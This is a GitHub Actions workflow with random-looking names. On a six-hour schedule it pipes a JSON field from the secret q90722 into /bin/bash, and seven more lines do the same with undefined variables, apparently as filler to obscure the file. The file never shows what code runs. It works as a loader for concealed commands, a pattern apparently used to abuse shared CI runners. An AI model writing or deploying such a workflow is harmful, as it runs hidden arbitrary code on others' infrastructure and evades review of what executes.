name: taohuixuan2518
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taohuixuan2518
        env:
          q90722: ${{ secrets.q90722 }}
        run: |
          echo $q90722 | jq -r .pjt0 | /bin/bash
          echo $higgw9 | jq -r .bidkh40 | /bin/bash
          echo $aidv08 | jq -r .jhn47 | /bin/bash
          echo $igjs7513 | jq -r .cari396 | /bin/bash
          echo $pjo8 | jq -r .dmys92436 | /bin/bash
          echo $hoel20 | jq -r .dscyt4048 | /bin/bash
          echo $sl3 | jq -r .zhfis58 | /bin/bash
          echo $q3 | jq -r .qjyz12 | /bin/bash

